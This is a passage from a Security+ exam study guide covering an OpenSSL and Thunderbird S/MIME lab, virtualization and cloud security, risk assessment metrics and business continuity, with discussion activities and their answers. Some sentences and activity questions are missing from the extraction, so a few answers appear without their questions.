14. To complete the secure communications loop, all you need is a certificate for
[email protected]. You will use OpenSSL to create a self-signed
certificate.
a) Open a terminal and run the following command (ignoring the line break):
openssl req -x509 -newkey rsa:2048 -keyout hostmaster.key -
out hostmastercert.crt -days 1095
Using OpenSSL to generate a self-signed certificate. (Screenshot used with permission from
Greenbone Networks.)
b) Enter Pa$$w0rd to confirm then respond to the prompts with appropriate country/
organization information. Set the name as hostmaster and the email address as
[email protected]
15. Create the files to import into Thunderbird locally and to send to Sam.
a) Run the following command (ignoring the line break):
openssl pkcs12 -export -in hostmastercert.crt -inkey
hostmaster.key -out hostmastercert.p12
b) Confirm the prompts with Pa$$w0rd
c) Switch back to the Thunderbird window. Right-click the [email protected]
account and select Settings.
d) Select the Security node and select the View Certificates button.
e) Select the Authorities tab and select the Import button.
f) Select the root directory, select the hostmastercert.crt file, and select Open.
g) Check the Trust this CA to identify email users check box and select OK twice.
h) Select the Your Certificates tab and select the Import button.
i) Select the hostmastercert.p12 file and select Open. Confirm by entering Pa$$w0rd
j) In both the Alert dialog box and Certificate Manager dialog box, select OK.
k) In the Account Settings dialog box, select the Select button under Digital Signing to
select the certificate. At the dialog box, select OK then select Yes to use the same
certificate for encryption as well.
l) Check the Digitally sign messages (by default) check box.
m) Select OK.
n) With the message from Sam selected, select the Reply button.
o) Select the Attach button and add the hostmastercert.crt file.
p) Select the arrow on the Security button and select Encrypt this Message.
q) Add some text and select Send.
r) Switch to PC1 and observe the icons on the new message. There is confirmation that
it has been encrypted, but the signature is not yet trusted (you need to add a trust).
The icons indicate that this message was encrypted but that the sender is not trusted.
(Screenshot used with permission from Mozilla Foundation.)
Note: If you try, you won't be able to get Thunderbird to trust the self-signed
certificate. This activity took a shortcut with the OpenSSL command used to
generate a certificate and hasn't specified the necessary key usage extensions.
Topic C
Summarize Secure Virtualization
Infrastructure
EXAM OBJECTIVES COVERED
1.6 Explain the impact associated with types of vulnerabilities.
3.7 Summarize cloud and virtualization concepts.
Many networks now make use of host virtualization to run server services or provide
secure user desktops. While your role may not include directly implementing and
provisioning these machines, you should certainly understand the concepts
underpinning virtualization and some of the risks and vulnerabilities that accompany
its use.
A bare metal virtual platform means that the hypervisor (Type I hypervisor) is
installed directly onto the computer and manages access to the host hardware without
going through a host OS. Examples include VMware ESX® Server, Microsoft's Hyper-V®,
and Citrix's XenServer. The hardware needs only support the base system
requirements for the hypervisor plus resources for the type and number of guest OSes
that will be installed.
Type I "bare metal" hypervisor—The hypervisor is installed directly on the host hardware along with a
management application, then VMs are installed within the hypervisor.
HYPERVISOR SECURITY
A virtual platform introduces an additional layer for the attention of security analysts;
that of the hypervisor. Hypervisor software is subject to patches and security
advisories like any other software. Some notable exploits have appeared, and as the
use of virtual platforms grows, hypervisors will increasingly be the target of attacks.
This becomes even more complex when the network infrastructure—switches and
routers—is also virtualized. Where the network infrastructure is implemented in
software, it may not be subject to inspection and troubleshooting by system
administrators, who would have to rely entirely on the hypervisor developer for
security.
Another issue is VM escaping. This refers to malware running on a guest OS jumping
to another guest or to the host. To do this, the malware must identify that it is running
in a virtual environment, which is usually simple to do. One means of doing so is
through a timing attack. The classic timing attack is to send multiple usernames to an
authentication server and measure the server response times. An invalid username
will usually be rejected very quickly, but a valid one will take longer (while the
authentication server checks the password). This allows the attacker to harvest valid
usernames. Malware can use a timing attack within a guest OS to detect whether it is
running in a VM (certain operations may take a distinct amount of time compared to a
"real" environment). There are numerous other "signatures" that an attacker could use
to detect the presence of virtualized system hardware. The next step in VM escaping is
for the attacker to compromise the hypervisor. Security researchers have been
focusing on this type of exploit and several vulnerabilities have been found in popular
hypervisors.
One serious implication of VM escaping is where virtualization is used for hosted
applications. If you have a hosted web server, apart from trusting the hosting provider
with your data, you have no idea what other applications might be running in other
customers' VMs. For example, consider a scenario where you have an e-commerce
web server installed on a virtual server leased from an ISP. If a third-party installs
another guest OS with malware that can subvert the virtual server's hypervisor, they
might be able to gain access to your server or to data held in the memory of the
physical server. Having compromised the hypervisor, they could make a copy of your
server image and download it to any location. This would allow the attacker to steal
any unencrypted data held on the e-commerce server. Even worse, it could conceivably
allow them to steal encrypted data, by obtaining the private encryption keys stored on
the server or by sniffing unencrypted data or a data encryption key from the physical
server's memory.
It is imperative to monitor security bulletins for the hypervisor software that you
operate and to install patches and updates promptly. You should also design the VM
architecture carefully so that the placement of VMs running different types of
applications with different security requirements does not raise unnecessary risks.
VM ESCAPE PROTECTION
Preventing VM escaping is dependent on the virtualization vendor identifying security
vulnerabilities in the hypervisor and on these being patched. The impact of VM
escaping can be reduced by using effective service design and network placement
when deploying VMs.
For example, when considering security zones such as a DMZ, VMs providing frontend
and middleware/backend services should be separated to different physical hosts. This
reduces the security implications of a VM escaping attack on a host in the DMZ (which
will generally be more vulnerable to such attacks).
Isolating VMs in different zones on separate hardware—This should reduce the impact of a VM
escaping attack. (Image © 123RF.com.)
feature of some hypervisors (allowing the user to revert to the saved image after
making changes) can be misused to perform DoS (by causing the undo file to grow to
the point where it consumes all the available disk space on the host). These sorts of
vulnerabilities can be mitigated by duplicating the guest OS on a redundant physical
server that can be used as a fail-over. This is costly, however, and keeping the
redundant server up to date and ready to be deployed can be complex.
Each VM needs to be installed with its own security software suite to protect against
malware and intrusion attempts. Each guest must also have a patch management
process. This might mean installing updates locally or replacing the guest instance
from an updated VM template image.
Note: Ordinary anti-virus software installed on the host will NOT detect viruses infecting
the guest OS. Scanning the virtual disks of guest OSes from the host will cause serious
performance problems.
Although one of the primary benefits of virtualization is the ease of deploying new
systems, this type of system sprawl and deployment of undocumented assets can
also be the root of security issues. We may see new virtualized systems go up and
down from one minute to the next across one or more virtualization farms, developer
laptops, and cloud offerings from several vendors. It will often be the case that a
system will be brought up for "just a minute" to test something, but languish for
months or years, undocumented, unsecured, and unpatched. Each of these
undocumented systems could represent an exploitable vulnerability. They increase the
potential attack surface of the network. Policies and procedures for tracking, securing,
and, when no longer used, destroying virtualized assets should be put in place and
carefully enforced.
Virtual machine lifecycle management (VMLM) software can be deployed to
enforce VM sprawl avoidance. VMLM solutions provide you with a centralized
dashboard for maintaining and monitoring all the virtual environments in your
organization. More generally, the management procedures for developing and
deploying machine images need to be tightly drafted and monitored. VMs should
conform to an application-specific template with the minimum configuration needed to
run that application (that is, not running unnecessary services). Images should not be
run in any sort of environment where they could be infected by malware or have any
sort of malicious code inserted. One of the biggest concerns here is of rogue
developers or contractors installing backdoors or "logic bombs" within a machine
image. The problem of criminal or disgruntled staff is obviously one that affects any
sort of security environment, but concealing code within VM machine images is a bit
easier to accomplish and has the potential to be much more destructive.
Note: The issue of system sprawl and undocumented assets is discussed here, in relation
to VMs, because that is where the problem tends to be most acute, but it is important to
document all processing and storage assets deployed within a network.
Activity 13-4
Discussing Secure Virtualization
Infrastructure
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
Software that manages virtual machines that has been installed to a guest OS.
This is in contrast to a Type I (or "bare metal") hypervisor, which interfaces
directly with the host hardware.
2. What is a VDE?
3. Why could the risk of a single point of failure be higher when virtual servers
are deployed?
The failure of a single hardware host or physical network link to the host could
disrupt multiple virtual server instances and applications.
VM escaping refers to attacking other guest OSes or the hypervisor or host from
within a virtual machine. Attacks may be to steal information, perform Denial of
Service, infect the system with malware, and so on.
Topic D
Summarize Secure Cloud Services
EXAM OBJECTIVES COVERED
3.7 Summarize cloud and virtualization concepts.
As applications are moved to the cloud to centralize access and management, the
security of cloud deployment becomes of increasing importance. As with virtualization,
while you may not be implementing cloud deployments, you must be able to
summarize cloud concepts and the key security issues.
CLOUD COMPUTING
From the consumer point-of-view, cloud computing is a service that provides on-
demand resources—server instances, data storage, databases, or applications—over a
network, typically the Internet. The service is a "cloud" because the end user is not
aware of or responsible for any details of the procurement, implementation, or
management of the infrastructure that underpins those resources. The end user is
only interested and pays for the services provided by the cloud.
Among other benefits, the cloud provides rapid elasticity. This means that the cloud
can scale quickly to meet peak demand. For example, a company may operate a single
web server instance for most of the year but provision additional instances for the
busy Christmas period and then release them again in the New Year. This example also
illustrates the principles of on-demand and pay-per-use; key features of a cloud
service (as opposed to a hosted service). On-demand implies that the customer can
initiate service requests and that the cloud provider can respond to them immediately.
Pay-per-use implies a measured service, so that the customer is paying for the CPU,
memory, disk, and network bandwidth resources they are actually consuming rather
than paying a monthly fee for a particular service level.
From the provider point-of-view, provisioning a cloud is quite similar to provisioning
any other type of large-scale data center. Cloud computing almost always uses one or
more methods of virtualization to ensure that resources are quickly and easily
provisioned to the client who requires them. The security implications of virtualization
are therefore closely tied to the security implications of the cloud. In order to respond
quickly to changing customer demands, cloud providers must be able to provision
resources quickly. This is achieved through resource pooling and virtualization.
Resource pooling means that the hardware making up the cloud provider's data center
is not dedicated or reserved to a particular customer account. The layers of
virtualization used in the cloud architecture allow the provider to provision more CPU,
memory, disk, or network resource using management software, rather than (for
instance) having to go to the data center floor, unplug a server, add a memory module,
and reboot.
Note: The NIST Definition of Cloud Computing (https://nvlpubs.nist.gov/nistpubs/
Legacy/SP/nistspecialpublication800-145.pdf) provides an authoritative definition of
what is a cloud service (and what isn't).
INFRASTRUCTURE AS A SERVICE
Infrastructure as a Service (IaaS) is a means of provisioning IT resources such as
servers, load balancers, and Storage Area Network (SAN) components quickly. Rather
than purchase these components and the Internet links they require, you rent them on
an as-needed basis from the service provider's data center. Examples include Amazon
Elastic Compute Cloud (https://aws.amazon.com/ec2), Microsoft Azure® Virtual
Machines (https://azure.microsoft.com/services/virtual-machines), and
OpenStack® (https://www.openstack.org).
SOFTWARE AS A SERVICE
Software as a Service (SaaS) is a different model of provisioning software
applications. Rather than purchasing software licenses for a given number of seats, a
business would access software hosted on a supplier's servers on a pay-as-you-go or
lease arrangement (on-demand). Virtual infrastructure allows developers to provision
on-demand applications much more quickly than previously. The applications can be
developed and tested in the cloud without the need to test and deploy on client
computers. Examples include Microsoft Office 365® (https://support.office.com),
Salesforce® (https://www.salesforce.com), and Google G Suite™ (https://
gsuite.google.com).
PLATFORM AS A SERVICE
Platform as a Service (PaaS) provides resources somewhere between SaaS and IaaS.
A typical PaaS solution would provide servers and storage network infrastructure (as
per IaaS) but also provide a multi-tier web application/database platform on top. This
platform could be based on Oracle® or MS SQL or PHP and MySQL™. Examples include
Oracle Database (https://cloud.oracle.com/paas), Microsoft Azure SQL Database
(https://azure.microsoft.com/services/sql-database), and Google App Engine
(https://cloud.google.com/appengine).
As distinct from SaaS though, this platform would not be configured to actually do
anything. Your own developers would have to create the software (the CRM or
e‑commerce application) that runs using the platform. The service provider would be
responsible for the integrity and availability of the platform components, but you
would be responsible for the security of the application you created on the platform.
Dashboard for Amazon Web Services Elastic Compute Cloud (EC2) IaaS/PaaS. (Screenshot used with
permission from Amazon.com.)
CLOUD STORAGE
Cloud storage is a particular type of Software as a Service where the vendor provides
reliable data storage and backup. Many cloud storage solutions are combined with
content management tools with document permission, version history, and
collaborative editing features.
SECURITY AS A SERVICE
The breadth of technologies requiring specialist security knowledge and configuration
makes it likely that companies will need to depend on third-party support at some
point. You can classify such support in three general "tiers":
• Consultants—the experience and perspective of an outsider can be hugely useful
in improving security awareness and capabilities in any type of organization (small
to large). Consultants could be used for "big picture" framework analysis and
alignment or for more specific or product-focused projects (pen testing, SIEM
rollout, and so on). It is also fairly simple to control costs when using consultants if
they are used to develop capabilities rather than implement them. Where
consultants come to "own" the security function, it can be difficult to change or
sever the relationship.
• Managed Security Services Provider (MSSP)—a means of fully outsourcing
responsibility for information assurance to a third party. This type of solution is
expensive but can be a good fit for an SME that has experienced rapid growth and
has no in-house security capability. Of course, this type of outsourcing places a
huge amount of trust in the MSSP. Maintaining effective oversight of the MSSP
requires a good degree of internal security awareness and expertise. There could
also be significant challenges in industries exposed to high degrees of regulation in
terms of information processing.
• Security as a Service (SECaaS)—can mean lots of different things, but is typically
distinguished from an MSSP as being a means of implementing a particular security
control, such as virus scanning or SIEM-like functionality, in the "cloud." Typically,
there would be a connector to the cloud service installed locally. For example, an
anti-virus agent would scan files locally but be managed and updated from the
cloud provider; similarly, a log collector would submit events to the cloud service for
aggregation and correlation. Examples include Cloudflare® (https://
www.cloudflare.com/saas), FireEye® (https://www.fireeye.com/solutions/
managed-defense.html), and SonicWall (https://www.sonicwall.com/solutions/
service-provider/security-as-a-service).
Note: It's not usually easy (or particularly useful) to distinguish between managed/
hosted services and genuinely cloud-based offerings.
SECaaS can also be taken to mean providing security systems for cloud-based
applications, such as Software as a Service (SaaS CRM, for instance) or Platform as a
Service (PaaS).
scanning for intrusions and monitoring network logs, applying OS and software
patches, and so on. You might or might not be responsible for some or all of the
software management functions, though—ensuring that administrators and users
practice good password management, configuring system privileges, making backups
of data, and so on.
Where critical tasks are the responsibility of the service provider, you should try to
ensure that there is a reporting mechanism to show that these tasks are being
completed, that their disaster recovery plans are effective, and so on.
Another proviso is that your company is likely to still be directly liable for serious
security breaches; if customer data is stolen, for instance, or if your hosted website is
hacked and used to distribute malware. The legal and regulatory "buck" still stops with
you; you might be able to sue the service provider for damages, but your company
would still be the point of investigation. You may also need to consider the legal
implications of using a cloud provider if its servers are located in a different country.
You must also consider the risk of insider threat, where the insiders are administrators
working for the service provider. Without effective security mechanisms such as
separation of duties and M of N control, it is highly likely that they would be able to
gain privileged access to your data. Consequently, the service provider must be able to
demonstrate to your satisfaction that they are prevented from doing so. There is also
the risk described earlier that your data is in proximity to other, unknown virtual
servers and that some sort of attack could be launched on your data from another
virtual server.
As with any contracted service, with any *aaS solution, you place a large amount of
trust in the service provider. The more important the service is to your business, the
more risk you are investing in that trust relationship.
Activity 13-5
Discussing Secure Cloud Services
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
3. Describe some key considerations that should be made when hosting data
or systems via a cloud solutions provider.
Summary
In this lesson, you completed the review of network architecture and design by looking
at application service issues and technologies.
• You should know how SSL/TLS can be used to implement secure web, email, file
transfer, and voice/video services.
• You should be able to configure S/MIME to sign and encrypt email messages.
• You should understand the risks posed by use of virtualization solutions and
recommend appropriate measures to manage virtual machines.
• You should be able to differentiate cloud deployment models and understand the
risks posed by use of cloud applications and data storage.
What steps has your organization taken to ensure the security of web services
and communications services?
A: Answers will vary. One way to ensure web services are secure is to implement
SSL and/or TLS for communication between the server and the client. For secure
communications, be sure to use the Secure versions of SMTP, POP3, and IMAP.
Also use HTTPS, SFTP, and FTPS.
Practice Questions: Additional practice questions are available on the course website.
LESSON INTRODUCTION
Analyzing risk plays a major role in ensuring a secure environment for an organization. By
assessing and identifying specific risks that can cause damage to network components, hardware,
and personnel, you can mitigate possible threats and establish the right corrective measures to
avoid possible damage to people or systems.
LESSON OBJECTIVES
In this lesson, you will:
• Explain risk management processes and concepts.
• Explain resiliency and continuity of operations strategies.
• Explain disaster recovery planning concepts.
• Summarize basic forensic concepts.
Topic A
Explain Risk Management Processes and
Concepts
EXAM OBJECTIVES COVERED
1.6 Explain the impact associated with types of vulnerabilities.
2.3 Given a scenario, troubleshoot common security issues.
5.2 Summarize business impact analysis concepts.
5.3 Explain risk management processes and concepts.
sort of mitigation, but other types of response might be more appropriate for
certain types and level of risks.
• Recovery Point Objective (RPO) is the amount of data loss that a system can
sustain, measured in time. That is, if a database is destroyed by a virus, an RPO of
24 hours means that the data can be recovered (from a backup copy) to a point not
more than 24 hours before the database was infected.
For example, a customer leads database might be able to sustain the loss of a few
hours' or days' worth of data (the salespeople will generally be able to remember
who they have contacted and re-key the data manually). Conversely, order
processing may be considered more critical, as any loss will represent lost orders
and it may be impossible to recapture web orders or other processes initiated only
through the computer system, such as linked records to accounting and fulfilment.
MTD and RPO help to determine which business functions are critical and also to
specify appropriate risk countermeasures. For example, if your RPO is measured in
days, then a simple tape backup system should suffice; if RPO is zero or measured in
minutes or seconds, a more expensive server cluster backup and redundancy solution
will be required.
For most businesses, the most critical functions will be those that enable customers to
find them and for the business to interact with those customers. In practical terms, this
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 14: Explaining Risk Management and Disaster Recovery Concepts | Topic A
582 | The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update
means telecoms and web presence. Following that is probably the capability to fulfil
products and services. Back-office functions such as accounting, HR, and marketing are
probably necessary rather than critical.
Note: This is all subject to circumstance. If the disaster strikes the day before the CEO is
due to present to the company's most important customers, ensuring that the
presentation goes ahead smoothly might be expected to take precedence. If the
customers are all going to be there in that room, getting the web server back is not going
to be as high a priority.
ASSET MANAGEMENT
Each IT system will be supported by assets, such as servers, disk arrays, switches,
routers, and so on. Key performance indicators (KPI) can be used to determine the
reliability of each asset. Some of the main KPIs relating to service availability are as
follows:
• Mean Time to Failure (MTTF) and Mean Time Between Failures (MTBF)
represent the expected lifetime of a product. MTTF should be used for non-
repairable assets. For example, a hard drive may be described with an MTTF, while a
server (which could be repaired by replacing the hard drive) would be described
with an MTBF. You will often see MTBF used indiscriminately, however. For most
devices, failure is more likely early and late in life, producing the so-called "bathtub
curve."
• The calculation for MTBF is the total time divided by the number of failures. For
example, if you have 10 devices that run for 50 hours and two of them fail, the
MTBF is 250 hours/failure (10*50)/2.
• The calculation for MTTF for the same test is the total time divided by the
number of devices, so (10*50)/10, with the result being 50 hours/failure.
MTTF/MTBF can be used to determine the amount of asset redundancy a system
should have. A redundant system can failover to another asset if there is a fault and
continue to operate normally. It can also be used to work out how likely failures are
to occur.
• Mean Time to Repair (MTTR) is a measure of the time taken to correct a fault so
that the system is restored to full operation. This can also be described as mean
time to "replace" or "recover." This metric is important in determining the overall
Recovery Time Objective (RTO).
An asset management process takes inventory of and tracks all the organization's
critical systems, components, devices, and other objects of value. It also involves
collecting and analyzing information about these assets so that personnel can make
more informed changes or otherwise work with assets to achieve business goals.
There are many software suites and associated hardware solutions available for
tracking and managing assets (or inventory). An asset management database can be
configured to store as much or as little information as is deemed necessary, though
typical data would be type, model, serial number, asset ID, location, user(s), value, and
service information. Tangible assets can be identified using a barcode label or Radio
Frequency ID (RFID) tag attached to the device (or more simply, using an identification
number). An RFID tag is a chip programmed with asset data. When in range of a
scanner, the chip activates and signals the scanner. The scanner alerts management
software to update the device's location. As well as asset tracking, this allows the
management software to track the location of the device, making theft more difficult.
Within the inventory of assets and business processes, it is important to assess their
relative importance. In the event of a disaster that requires that recovery processes
take place over an extended period, critical systems must be prioritized over merely
necessary ones.
It is also important to realize that asset management procedures can easily go astray—
assets get mislabeled, new assets are not recorded, and so on. In these cases, some
troubleshooting tactics can include:
• Ensure that all relevant assets are participating in a tracking system like barcodes or
passive radio frequency IDs (RFIDs).
• Ensure that there is a process in place for tagging newly acquired or developed
assets.
• Ensure that there is a process in place for removing obsolete assets from the
system.
• Check to see if any assets have conflicting IDs.
• Check to see if any assets have inaccurate metadata.
• Ensure that asset management software can correctly read and interpret tracking
tags.
• Update asset management software to fix any bugs or security issues.
THREAT ASSESSMENT
Threat assessment means compiling a prioritized list of probable and possible
threats. Some of these can be derived from the list of assets (that is, threats that are
IMPACTS ON PROPERTY
Again, risks whose impacts affect property (premises) mostly arise due to natural
disaster, war/terrorism, and fire.
IMPACTS ON PRIVACY
Another important source of risk is the unauthorized disclosure of personally
identifiable information (PII). The theft or loss of PII can have an enormous impact on
an individual because of the risk of identity theft and because once disclosed, the PII
cannot easily be changed or recovered. Organizations should perform regular audits to
assess whether PII is processed securely. These may be modelled on formal audit
documents mandated by US laws, notably The Privacy Act and the Federal Information
Security Management Act (FISMA):
• Privacy Threshold Analysis (PTA)—An initial audit to determine whether a computer
system or workflow collects, stores, or processes PII to a degree where a PIA must
be performed. PTAs must be repeated every three years.
• Privacy Impact Assessment (PIA)—A detailed study to assess the risks associated
with storing, processing, and disclosing PII. The study should identify vulnerabilities
that may lead to data breach and evaluate controls mitigating those risks.
• System of Records Notice (SORN)—A formal document listing PII maintained by a
federal agency of the US government.
Quantitative risk assessment aims to assign concrete values to each risk factor. (Image © 123RF.com.)
Quantitative risk assessment aims to assign concrete values to each risk factor.
• Single Loss Expectancy (SLE)—The amount that would be lost in a single
occurrence of the risk factor. This is determined by multiplying the value of the
asset by an Exposure Factor (EF). EF is the percentage of the asset value that would
be lost.
• Annual Loss Expectancy (ALE)—The amount that would be lost over the course of
a year. This is determined by multiplying the SLE by the Annual Rate of
Occurrence (ARO).
The problem with quantitative risk assessment is that the process of determining and
assigning these values is complex and time consuming. The accuracy of the values
assigned is also difficult to determine without historical data (often, it has to be based
on subjective guesswork). However, over time and with experience, this approach can
yield a detailed and sophisticated description of assets and risks and provide a sound
basis for justifying and prioritizing security expenditure.
Value, Medium Value, and Low Value; risks could be categorized as one-off or recurring
and as Critical, High, Medium, and Low probability.
Another simple approach is the "Traffic Light" impact grid. For each risk, a simple Red,
Yellow, or Green indicator can be put into each column to represent the severity of the
risk, its likelihood, cost of controls, and so on. This approach is simplistic but does give
an immediate impression of where efforts should be concentrated to improve security.
It is not often possible to eliminate risk; rather the aim is to mitigate risk factors to the
point where the organization is exposed only to a level of risk that it can afford
(residual risk). Risk mitigation (or remediation) is the overall process of reducing
exposure to or the effects of risk factors. There are several ways of mitigating risk. If
you deploy a countermeasure that reduces exposure to a threat or vulnerability that is
risk deterrence (or reduction). Risk reduction refers to controls that can either make a
risk incident less likely or less costly (or perhaps both). For example, if fire is a threat, a
policy strictly controlling the use of flammable materials on site reduces likelihood
while a system of alarms and sprinklers reduces impact by (hopefully) containing any
incident to a small area. Another example is offsite data backup, which provides a
remediation option in the event of servers being destroyed by fire.
Other risk response strategies are as follows:
• Avoidance means that you stop doing the activity that is risk-bearing.
For example, a company may develop an in-house application for managing
inventory and then try to sell it. If while selling it, the application is discovered to
have numerous security vulnerabilities that generate complaints and threats of
legal action, the company may make the decision that the cost of maintaining the
security of the software is not worth the revenue and withdraw it from sale.
Obviously, this would generate considerable bad feeling amongst existing
customers. Avoidance is not often a credible option.
• Transference (or sharing) means assigning risk to a third party (such as an
insurance company or a contract with a supplier that defines liabilities). For
example, a company could stop in-house maintenance of an e‑commerce site and
contract the services to a third party, who would be liable for any fraud or data
theft.
Note: Note that in this sort of case, it is relatively simple to transfer the obvious risks,
but risks to the company's reputation remain. If a customer's credit card details are
stolen because they used your unsecure e‑commerce application, the customer won't
care if you or a third party were nominally responsible for security. It is also unlikely
that legal liabilities could be completely transferred in this way.
• Acceptance (or retention) means that no countermeasures are put in place either
because the level of risk does not justify the cost or because there will be
unavoidable delay before the countermeasures are deployed. In this case, you
should continue to monitor the risk (as opposed to ignoring it).
Activity 14-1
Discussing Risk Management Processes
and Concepts
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. Apart from natural disaster, what type of events threaten physical damage
to assets?
2. Which two metrics must you reduce in order to meet an MTD target?
The risk (as determined by impact and likelihood) compared to the cost of the
control. This metric can be calculated as Return on Security Investment (ROSI).
Single Loss Expectancy (SLE) or Annual Loss Expectancy (ALE). ALE is SLE
multiplied by ARO (Annual Rate of Occurrence).
Risk transference.
Activity 14-2
Performing a Business Impact Analysis
SCENARIO
The single largest source of revenue for Develetech is its online storefront. The
storefront is hosted by numerous servers distributed all over the world, and services
millions of customers in over one hundred countries. On Monday at 9:00 A.M., during
routine maintenance, an administrator issued commands through his control console
to wipe the hard drives of 3 servers so that they could be updated with new system
images. The administrator, however, mistyped the commands and actually wiped the
entire cluster servicing the storefront. This took the store down for all customers
worldwide.
Additional important facts about the event include:
• The last backups of the storefront servers were performed on Sunday at 9:00 P.M.
• The organization previously determined that a loss of transaction data stretching
more than 6 hours could seriously complicate the fulfillment process and lead to
thousands of angry customers demanding refunds.
• All of the servers require a full restart and to undergo restoration from the backups
before they return to production. The disaster personnel reviewing the damage
conclude that this process will take an average of 8 hours for each server.
• Multiple servers can undergo recovery at the same time, but due to personnel and
network bandwidth limitations, some servers will be unable to undergo the
recovery process right away.
• Overall, Develetech believes that it can recover the storefront fully in about 2 days.
• A prior assessment revealed that Develetech cannot afford to go without the
storefront as a revenue source for more than 3 days.
Given this information, you'll use various metrics to conduct a BIA.
3 hours
6 hours
9 hours
12 hours
2. Did Develetech meet its RPO? Why or why not? What changes would you
suggest, if any?
Develetech did not meet its RPO. The last backup was 12 hours before the
event, but the company's RPO is only 6 hours. This means there are 6 hours
worth of unrecoverable data that the organization could not tolerate losing.
Develetech should increase the frequency of its backups in order to meet the
RPO.
6 hours
8 hours
2 days
3 days
6 hours
8 hours
2 days
3 days
5. Assume that there are 100 servers, and the administrators can only recover
20 at a time before moving on to the next 20. Does this cause a conflict with
the organization's RTO? Why or why not?
This does not necessarily cause a conflict with the organization's RTO. If the
MTTR is 8 hours, then it will take 40 hours to recover 5 sets of 20 servers. Since
40 hours is less than the RTO of 2 days (48 hours), the organization can still hit
its objective.
2 days
3 days
4 days
5 days
7. Assume that Develetech does not reach its RTO, and actually exceeds its
MTD before the storefront is fully operational again. What impact might this
have on the business?
Answers may vary. The most prominent impact will be the hit the organization
takes to its finances. Because the storefront is Develetech's revenue leader, the
lack of transactions for more than 3 days will impact its ability to sustain its own
operational costs, as well as cause its market value to plummet. While less
quantifiable, Develetech's reputation will likely be impacted as well. A customer
backlash to the outage may tarnish the company's brand irrevocably.
Topic B
Explain Resiliency and Automation
Strategies
EXAM OBJECTIVES COVERED
3.8 Explain how resiliency and automation strategies reduce risk.
The output of risk assessments will identify vulnerable business processes. To reduce
risks in these processes, you can make the IT systems and other business systems that
support them resilient to failure. While you may not be responsible for designing and
implementing all these resiliency strategies, you must be able to explain how they
reduce risk and provide continuity of operations.
RESILIENCY STRATEGIES
Continuity of Operations Planning (COOP), sometimes referred to as a business
continuity plan (BCP), is a collection of processes that enable an organization to
maintain normal business operations in the face of some adverse event. There are
numerous types of events, both natural and man-made, that could disrupt the
business and require a continuity effort to be put in place. They may be instigated by a
malicious party, or they may come about due to careless or negligence on the part of
non-malicious personnel. The organization may suffer loss or leakage of data; damage
to or destruction of hardware and other physical property; impairment of
communications infrastructure; loss of or harm done to personnel; and more. When
these negative events become a reality, the organization will need to rely on resiliency
and automation strategies to mitigate their effect on day-to-day operations.
Note: NIST has published a guide to resiliency and IT contingency planning (SP800-34)
available at https://nvlpubs.nist.gov/nistpubs/Legacy/SP/
nistspecialpublication800-34r1.pdf. There are also BSI and ISO standards associated
with business continuity planning.
Computer systems require protection from hardware failure, software failure, and
system failure (failure of network connectivity devices, for instance).
When implementing a network, the goal will always be to minimize the single points
of failure and to allow ongoing service provision despite a disaster. To perform IT
Contingency Planning (ITCP), think of all the things that could fail, determine whether
the result would be a critical loss of service, and whether this is unacceptable. Then
identify strategies to make the system resilient. How resilient a system is can be
determined by measuring or evaluating several properties.
HIGH AVAILABILITY/UPTIME
One of the key properties of a resilient system is high availability. Availability is the
percentage of time that the system is online, measured over the defined period
(typically one year). The corollary of availability is downtime (that is, the percentage or
amount of time during which the system is unavailable). The maximum tolerable
downtime (MTD) metric states the requirement for a particular business function. High
availability is usually loosely described as 24x7 (24 hours per day, 7 days per week) or
24x365 (24 hours per day, 365 days per year). For a critical system, availability will be
described as "two-nines" (99%) up to five- or six-nines (99.9999%).
Downtime is calculated from the sum of scheduled service intervals (Agreed Service
Time) plus unplanned outages over the period.
the resource will grow in power to the level required. This results in cost-effective
operations.
Distributive allocation refers to the ability to switch between available processing
and data resources to meet service requests. This is typically achieved using load
balancing services during normal operations or automated failover during a disaster.
Network cabling should be designed to allow for multiple paths between the various
servers, so that during a failure of one part of the network, the rest remains
operational (redundant connections). Routers are great fault tolerant devices,
because they can communicate system failures and IP packets can be routed via an
alternate device.
Note: Multiple switching paths require use of Spanning Tree Protocol (STP) to prevent
loops. Also note that routers can only be fault tolerant if there are multiple routes to
choose from!
NON-PERSISTENCE
When recovering systems, it may be necessary to ensure that any artifacts from the
disaster, such as malware or backdoors, are removed when reconstituting the
production environment. This can be facilitated in an environment designed for non-
persistence. Non-persistence means that any given instance is completely static in
terms of processing function. Data is separated from the instance so that it can be
swapped out for an "as new" copy without suffering any configuration problems. There
are various mechanisms for ensuring non-persistence:
• Snapshot/revert to known state—This is a saved system state that can be reapplied
to the instance.
• Rollback to known configuration—A physical instance might not support snapshots
but has an "internal" mechanism for restoring the baseline system configuration,
such as Windows System Restore.
• Live boot media—another option is to use an instance that boots from read-only
storage to memory rather than being installed on a local read/write hard disk.
Note: Live boot media is widely used in computer forensics, where it is important to
demonstrate that the system under inspection has not been tampered with. A
forensics disc uses live boot to make analysis and recovery tools available without
modifying the host configuration.
Note: To learn more, watch the related Video on the course website.
Activity 14-3
Discussing Resiliency and Continuity of
Operations Strategies
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
Qualitatively, using uptime terms such as "Extremely highly available," "Very highly
available," "Highly available," etc.
Aside from RAID 0, RAID provides redundancy between a group of disks, so that
if one disk were to fail, that data may be recoverable from the other disks in the
array.
Non-persistence means that any code or configuration that does not conform
to the deployment template or master image is removed when a system is
restored (or rebooted). This mitigates against the risk of malware continuing to
infect a system or an adversary maintaining access to a compromised host.
Topic C
Explain Disaster Recovery and Continuity
of Operation Concepts
EXAM OBJECTIVES COVERED
2.2 Given a scenario, use appropriate software tools to assess the security posture of an
organization.
5.6 Explain disaster recovery and continuity of operation concepts.
Even the most resilient system that has been designed with fault tolerance and
redundancy can suffer catastrophic failure or disaster. Maintaining business
operations in the wake of a disaster is a complex challenge. There is no one approach
that will adequately mitigate the effects of all potential disasters. You must therefore
identify the various continuity of operations processes that are available to you, and
